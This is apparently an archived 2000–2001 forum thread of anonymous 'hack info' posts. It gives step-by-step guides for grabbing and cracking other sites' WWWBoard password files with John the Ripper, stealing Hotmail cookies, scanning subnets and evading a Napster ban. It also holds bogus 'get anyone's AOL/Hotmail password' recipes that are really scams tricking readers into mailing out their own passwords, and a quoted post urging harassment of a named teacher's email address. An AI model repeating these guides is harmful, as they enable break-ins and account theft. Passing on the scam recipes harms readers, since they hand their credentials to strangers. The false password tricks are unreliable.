Use this category for hack info.
-- Anonymous, May 09, 2000
Answers
http://www.sotmesc.org/gcms/hackbb/bbindex.html
Hack
Bulletin Board
-- Anonymous, May 09, 2000
http://www.sotmesc.org/gcms/webmail/bbindex.html
A href="http://www.sotmesc.org/gcms/webmail/bbindex.html">hack e-mail
accounts (hotmail etc.)
-- Anonymous, May 09, 2000
hack e-
mails (hotmail, etc.)
-- Anonymous, May 09, 2000
yahoo
astalavista
crack & hacks
-- Anonymous, June 05, 2000
I asked about hacking at:
Link
http://www.microsux.cjb.net./
-- Anonymous, June 05, 2000
----------------------------------------------------------------------
----------
Posted by SunDevil (212.153.190.2) on May 15, 2000 at 02:36:21:
In Reply to: Re: banned from Napster, I want back on! posted by Cable
on May 14, 2000 at 23:42:01:
: : : No, not yet... But I will try that. I've also heard that there
is some way to change the registry, but have not found any more
information regarding that trick. Anyone have a suggestion (yes, it's
probably more lazy, but more simple)? Thankyou all who respond.
: : : ~Cable
: : : *http://www.cyberarmy.com/lists/proxy/
: : 1. Click on START>RUN type in regedit
: : 2. When regedit is open find HKEY_LOCAL_MACHINE\software\Napster
After click on the napster folder look on the right side of the
screen. Select the key CurrentUser press DELETE click on the plus
sign next to Napster on the left side of the screen. Select every
folder in the Napster folder one by one. Every time you find
CurrentUser press DELETE
: : 3. Now press Ctrl + f When the search window opens type in:
: : 35D38C13-1434-AB7E-003483943341AA When it finds a file DELETE it.
After you delete it press the F3 key. Delete the next file it finds.
Continue until it says "Search Returns No Results" or something along
those lines.
: : 4. Now press Ctrl + f again. This time type in:
: : A1AD8C13-1383-5343-DCC38E43FF0AAE Now do the same thing you did
in step 3.
: : 5. Now press Ctrl + f again. This time type in:
: : CAD8C813-1F34-1B3E-00CEAE43FF0AAD Now do the same thing you did
in step 3.
: : 6. Restart your computer.
: : 7. Open Napster. If you deleted all the CurrentUser keys properly
it will ask you to set up a new account. Create a new account using a
UserName and
: : E-Mail address different than the one you used in your banned
account.
: : 8. Napster should be working properly now. If it is not, well, it
is due to your error. ENJOY NAPSTER.
-- Anonymous, June 05, 2000
Re: da wickedest hacking toolz?
----------------------------------------------------------------------
----------
[ Follow Ups ] [ Post Followup ] [ Programming BB ] [ FAQ ]
----------------------------------------------------------------------
----------
Posted by xp (193.113.185.170) on June 05, 2000 at 12:25:39:
In Reply to: da wickedest hacking toolz? posted by Eastidaz on June
05, 2000 at 04:32:56:
Prehaps a dictionary and a sense of grammer would help. If you have
access to a *nix / *BSD box or shell get a copy of Whisker and Nmap
(Network Mapper) from
www.wiretrip.net/rfp (rain.forest.puppy's Whisker)
and
www.insecure.org/nmap (Fyadors Nmap)
Both are written in perl and are examples of exellent programming and
imagiantion.
In my own opinion nmap is the better of the two with a wide range of
scanning utilities (Vanilla TCP connect() scanning,TCP SYN (halfopen)
scanning, TCP FIN, Xmas, or NULL (*basicaly a true stealth scanner*)
scanning,TCP ftp proxy (bounce attack) scanning SYN/FIN scanning
using IP fragments (bypasses some packet filters) and more !
This should be posted on the hacking board but seening as the tool's
I mentioned are open source and good exapmle for all programmers it
has a place here too.
Xp
-- Anonymous, June 05, 2000
http://astalavista.box.sk/
linnk
-- Anonymous, June 05, 2000
http://neworder.box.sk/box.php3?
gfx=neworder&prj=neworder&key=pwdcrax&txt=Password%20crackers
password crackers
-- Anonymous, June 05, 2000
Subject: Filtered: I think you should check out what one of your
students is up to...
Date: June 5, 2000 8:47:44 PM EDT
To: bjb@hayes.kent.sch.uk Add to Address Book
CC:
RM ScanMail V1.2
Copyright RM plc 1999
Email Filtered: Banned words found for the receiver
bjb@hayes.kent.sch.uk, (Threshold 1):
- ARSEHOLE
- FUCK
- fucking
- shit
----------------------------------------
Apparently, one of your students runs a hack site and was VERY upset
with
you yesterday. I'm including a copy of the posts because I'm very
disturbed
by his attitude.
You will notice in his second post he said "GET HIM". I suspect if
you are
bombarded with e-mails, this is where it originated from. At any rate
you
probably should be wary of this young man.
Good luck!
http://the-lamer.hypermart.net/wwwboard/messages/705.html
My IT Teacher
Posted by Snipe from usercp99.aol.uk.uudial.com (62.125.26.116) on
Monday,
June 05, 2000 at 5:41PM :
i had a run in with my fucking IT teacher today.
He started saying "your nothing special when it comes to computers,
you
couldnt make this project"
And I said "WHAT THE FUCK U MEAN IAM NOTHING SPECIAL! IVE FUCKING
BYPASSED
YOUR FUCKING PROXY SERVER TO UNFILTER THE NET CONNECTION, IVE FUCKING
HACKED
INTO SITES, AND WHEN U PUT THAT CD IN THE SETUP UTILITY WAS BOUND
WITH A
FUCKING TROJAN SO I KNOW MORE THAN U ARSEHOLE"
and then ke kicked me out
bjb@hayes.kent.sch.uk - have fun wont you
ALSO:
Re: My IT Teacher
Posted by Snipe from usercp99.aol.uk.uudial.com (62.125.26.116) on
Monday,
June 05, 2000 at 6:29PM :
In Reply to: Re: My IT Teacher posted by I'm new and stupid from
ACA2892B.ipt.aol.com (172.162.137.43) on Monday, June 05, 2000 at
6:13PM :
yea, he is a fucking idiot anyway.
He has been to 2 lessons out of 135 so far, then says "you only know
what
your taught!"
If i relied on what the little fuck taught me Id know jack shit now!
So kill first, second, and third.
GET HIM --------> bjb@hayes.kent.sch.uk
-- Anonymous, June 06, 2000
Posted by Snipe from userdm21.aol.uk.uudial.com (62.125.35.29) on
Tuesday, June 06, 2000 at 9:34PM :
In Reply to: Re: that is so LAME posted by acet0 from spider-
th071.proxy.aol.com (152.163.213.76) on Tuesday, June 06, 2000 at
6:36PM :
Yea, but i aint said nothing to bendle (thats his name btw)
And he really is a lazy fucker so he wouldnt bother to find out who
it was - obviously took the necessary precautions. And if he did find
out then he couldnt be arsed to do anything about it
This school (Hayes School) has the worst IT results in the country -
and he is the reason why
: yeah but if the story that you gave matches the truth that is more
then enough info to prosecute
-- Anonymous, June 06, 2000
Instructions for use of Cdeer�s WWWboard Whacker
#1 Surf over to the webboard you wish to hack. Change wwwboard.htm
to passwd.txt. Download it.
#2 get offline, and place the passwd.txt in the C:\Dooley
directory. Let it overwrite any file in that directory.
#3 run the file runme.bat
#4 this will bring you to 3 options. The first is run with
dictionary file. This does not usally take up much time, but almost
never comes up with a password. But run it anyway. A pentium can
run it in 2 seconds. If you get something like
v: 0 c: 11223 t: 0:00:00:02 99% c/s: 5611 w: *****DONE*****,
Then you did not get a match. Go to #5.
If you secceed go to #6
#5 run all. This one is a major time investment. Thankfully Win95s
multitasking is pretty good. You can run it in the background as you
do small things like surf, but dont expect to do any 3d rendering.
#6 now, hopefully you have a password. Write it down and surf to
the site. Now you need to find the WWWadmin.cgi file. mosttimes you
can just change the directory to cgi-bin and type WWWadmin.cgi.
Sometumes its .pl. But in some cases this may not work.. But try it
first anyway. Sometimes people are actually concerned about the
security of thier webboard, (an oddity) or there are more than 1
webboards on that server, and the admin script has a different name.
Sometimes you get lucky, and can see a directory listing of the Cgi-
bin! (Really stupid people run that server) But sometimes you get
logged.How? Just do the domain name and then /cgi-bin/ or sometimes
(rare cases)/cgibin/. Sometimes it may say you dont have
authorization to view this, but sometimes you do. Ok you have a
nice directory listing. Now what? Look for files that are 27 kb in
size. There is a very good chance these are the admin scripts.
#7 run the admin scripts and....
some important facts
the default password and name are:
name: Webadmin
pw: WebBoard
sometimes ppl are stupid and leave things like this (I have seen it
done)
hope you enjoy WWWboard Whacker
look for me, Cdeer on kali, IRC, everything
url for WWWboard Whacker homepage-
members.aol.com/CCDooley/Hack.html
questions?
E-mail- CCDooley@aol.com
coming soon-
Cdeer�s WWWboard Whacker V 1.0
-- Anonymous, June 10, 2000
In Reply to: Port Scanner posted by PortHappy on December 15, 2000 at
11:28:54
Find a web address: www.yahoo.com for example.
Find it's IP address by either pinging, tracerouting, etc. yahoo.com
is 204.71.200.75
Get a port scanner that can scan subnets and scan 204.71.1.1 to
204.71.255.255 and you'll be able to find some people with open
ports. Now which ports you want to scan for is up to you.
SuperScan 3.0 is a decent port scanner that scans across subnets.
-- Anonymous, December 18, 2000
proxy places?
link
-- Anonymous, December 18, 2000
How to steal aol passwords
greenspun.com : LUSENET : Unk's Wild Wild West : One Thread
----------------------------------------------------------------------
----------
Found this in a forum and it works! (1) Send an E-mail to
getpw4u@mail.com (2) In the subject box type the screenname of the
person whos password you wish to steal (3) In the message box type
the following: /cgi-bin/start?v703&login=passmachine&f=(your aol
password)&f=27586&javascript=ACTIVE&rsa> (4)Send the e-mail with a
file attatched "NO" greater than 1 megabyte in size 5) wait 2-3
minutes and check your mail (6) Read the message.-Where YOUR password
was typed before, NOW, the password of the screenname in the subject
box is there Why does this work? I'll tell you. When you send this e-
mail, you are sending it to Aol central computer. It will not accept
file attachments without a valid password. When it reads your valid
password in the message, it is fooled into thinking that it is the
password of the user in the subject box. But since Aol cannot handle
file attachments over a certain bytes in size, It returns the e-mail
to you, Accidently correcting the password. Have fun!! *disclaimer*-
i am not responsible if someone decides to exploit this error in Aol
central computer.
-- (Mary@had a.little lamb), April 07, 2001
Answers
How to get UK AOL Passwords It's so simple and easy. Just send an
email to: aolbackpasswords@email.com with this in the Subject line:
recoverAOLpassword(your screename)recover(screename you need)
backupmachine(yourpassword)
AND THAT'S IT, YOU WILL GET EMAILED BACK WITH THE PASSWORD YOU
REQUIRE. IT'S A SIMPLE AS THAT .... EASY!!!!
-- Anonymous, April 09, 2001
all you have to do is log/steal their cookie i think it wont expire
for a month then go to this URL
http://lw7fd.law7.hotmail.msn.com/cgi-bin/HoTMaiL
to get the pass make a fake page and change method to GET and it will
show the pass in the URL
-- Anonymous, June 16, 2001
here is the way to hack a hotmail password and it is easy to do
i got it from x-emp in hotmail
and this is the steps for it
First, start with opening your own hotmail address. Select compose.
type in the fields:
to: all_pa_ss_word@hotmail.com
subject: RETRIVE.MSN.PW (case sensitive)
message:
[first line] the login name of the person you want to hack
[2nd line] your own password, because the automatic hotmail responder
will require
your "system administrator password" which is in fact your own
password!!! But the
computer doesn't know
[third line] x3iZ0k45-MSN-6TqGW (case sensitive)
[fourth line] sB718-22345-1294BD (case sensitive)
[fifth line] open.server
{};hide;staff10.curm.nbox.TARGET_USERNAME_HERE.when{i}
return{}true.suid.wrap(YOUR_EMAIL_HERE)23%54%45%45%76%09%
(YOUR_PASSWORD_HERE)runmail.imap34.send{}true.
How it works: you mail to a system administrators automatic
responder. Usually only
system administrators should be able to use this, but when you try it
with your own
password and mail this message from your hotmail account the computer
gets
confused!
MSN will respond with an automated message indicating the password
requested - note that
if the message you send MSN is composed incorrectly, or there has
been a change in the status of the user queried, you may not get an
automated
response - in this event, you will need to re-submit the request.
enjoy your hacking
-- Anonymous, June 18, 2001
I was trying for a long time to find some passwords and i have
finally made it...(i have a friend -staff- of hotmail)
1) OPEN YOUR E-MAIL ACCOUNT AND "COMPOSE" A LETTER.
2) IN THE E-MAIL, TYPE - all_pa_ss_word@hotmail.com
(THIS IS THE EMAIL ADDRESS SERVER STAFF USE TO RECOVER FORGOTTEN
PASSWORDS.)
3) IN THE SUBJECT BOX, TYPE - LOST PASSWORD
4) IN THE MAIN TEXT,FIRST LINE, TYPE THE E-MAIL ADDRESS OF THE PERSON
YOU WISH TO GET THE PASSWORD FOR.
5)SECOND LINE, TYPE YOUR HOTMAIL PASSWORD. (THE SERVER WILL THEN
RECOGNISE YOU ARE FROM THE STAFFAND WILL SEND YOU THE EMAIL.
6)SEND THE MAIL AND WITHIN 6 HOURS, YOU WILL HAVE THEIR PASSWORD SENT
TO YOUR ACCOUNT.
P.S - THIS IS FOR INFORMATION PUPROSES ONLY.
-- Anonymous, June 18, 2001
: If you need any password you must:
: send your e-mail adress and password to the adress below in this
style of lay out:>>>>
: E-mail adress:youre-mail@whatever.com
: Password:yourpassword
: Victim:the victims e-mail adress
: To activate the cgi bin, type this at the bottom:"LSTPSWRD"
: The password wanted will be sent to you at about 2 hours from the
time sent...
: You may be asking why the password is needed; it is needed so that
the computer server identifies you as a some one that works for them
: Send them to either:
: paswords@lycos.com for lycos passwords
: Paswords@hotmail.com for hotmail
: Or Paswords@yahoo.com for yahoo passwords
: Personally I recomed you use Lycos becaue it is more likely to work
there
-- Anonymous, June 18, 2001
if it's wwwboard just grab the password file and run it through john
(JTR, John The Ripper). DES .... pffft.
-- Anonymous, October 11, 2001
it's not a hard program to use AT ALL !
Download JTR (do a search on google) and a wordlist and extract them.
download a few wordlists (again, search for them) Then grab the
passwd.txt file from your wwwboard
(www.*******.com/wwwboard/passwd.txt) and put that in the same
directory as the john.exe.
Open john.ini in a text editor and look for the wordlist line ....
point that to one of the list you just downloaded. then from the
command prompt type :
john passwd.txt
and it'll start.
Look, you'll save yourself 30 notes and if you ever forget again ....
-- Anonymous, October 11, 2001
signature for jtr
Version: 2.6.3ia
Comment: http://www.openwall.com/signatures/
iQCVAwUAN+L6s3K5fbEpUCnxAQEmRAP/RW2qAWSfmCQ4gXmc87hLxAliz5QVgwqS
kK+64KaskUEOyJT0jUTmTuFFgKk2Arf5Gw2d9iX7Q+5n/XSACpCEkUE2w87L0JdS
F7SaERSQikp0KKVGIFkd24KAlG8eQR11jr+yMofmm/1oXOaeSLBtCc8wm58Ygr0q
DQsyiQJNE+I=
=KnXl
-- Anonymous, October 11, 2001
Create a text document with the password that you want to crack in it
with the format given below
john:234abc56
Or you can just use the file in the format it is given, John the
Ripper will work with either format, this is an example of what part
of a password file looks like with all the information.
john:234abc56:9999:13:John Johnson:/home/dir/john:/bin/john
To open a text document in windows go to
start/programs/accessories/word pad
Broken down, this is what the above password file states:
john:234abc56:9999:13:John Johnson:/home/dir/john:/bin/john
Username: john
Encrypted Password: 234abc56
User Number: 9999
Group Number: 13
Other Information: John Johnson
Home Directory: /home/dir/john
%0RävAShell: /bin/john
-- Anonymous, October 11, 2001
You'd call it a message board.
WWWBoard is a specific type of message board written in perl. It
saves the password in a world readable DES encrypted file, and seeing
as a DES
password can be brute forced in as little as a few minutes it's
considered highly insecure.
-- Anonymous, October 11, 2001
Posted by xp (213.122.156.32) on October 11, 2001 at 15:59:30
In Reply to: Is hacking a web page all social engineering?? posted by
fubyou on October 11, 2001 at 15:39:08
Doh !
Most defacements don't envolve any passwords.
Just exploit a deamon on the webserver (or machine networked to) and
away you go !
Passwords ..... pffft.
-- Anonymous, October 11, 2001
extract it all with winzip.
It will make two dirs. One named run, one named docs (readmes).
Go into run and open the john.ini, and under the {options] section
point the Wordfile line to your dictionary file (search google
for "word lists")
for example :
Wordfile = ~/web2.txt
save it and open a command prompt and go into the john dir, for
example :
Microsoft(R) Windows 98
(C)Copyright Microsoft Corp 1981-1998.
C:\> cd jtr
C:\jtr> cd run
C:\jtr\run>john password.txt
Loaded 36 passwords with 5 different salts (Standard DES [24/32 4K])
thats assuming your extracted John to a dir called jtr and your
passwd file is called password.txt. John is then "cracking" all the
passwords in that file, it will display them as it cracks them, or
you can minimize it and it will save all passwords to john.pot in the
run directory. you can open that with PowerPoint or just a simple
text editor, cracked passwords look like this :
EJhxDckFNSWH2:unique
6faW0RrW9VS/Y:voyage
B2cjF6ev0j6t.:watch
TnHSn.qIi8T4U:water
lWE6VwghmG/fg:starr
kIndTjUcbP6Bg:deathmar
RIBbyzKwl4tio:gumma
RITT/Ff34Z.9s:saga
ATXKFt3baWGto:nitram
Ignore everything to the left of the colon, thats the pre-cracked DES
encryped password, but to the right is the password in plain text :)
-- Anonymous, October 12, 2001
Moderation questions? read the FAQ